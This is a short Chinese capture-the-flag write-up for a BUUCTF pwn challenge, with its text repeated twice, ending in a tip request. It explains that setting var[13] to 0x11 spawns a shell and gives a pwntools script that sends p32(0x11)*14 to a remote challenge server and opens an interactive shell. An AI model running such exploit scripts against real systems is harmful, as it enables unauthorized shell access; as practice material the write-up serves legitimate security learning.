此题32位开启canary和pie
ida中查看主函数发现var[13]==0x11即可调用system("/bin/sh")
则考虑将var[13]赋值为0x11即可
exp:
from pwn import *
io=remote("node4.buuoj.cn",25153)
payload=p32(0x11)*14
io.sendline(payload)
io.interactive()
此题32位开启canary和pie
ida中查看主函数发现var[13]==0x11即可调用system("/bin/sh")
则考虑将var[13]赋值为0x11即可
exp:
from pwn import *
io=remote("node4.buuoj.cn",25153)
payload=p32(0x11)*14
io.sendline(payload)
io.interactive()
扫码打赏,你说多少就多少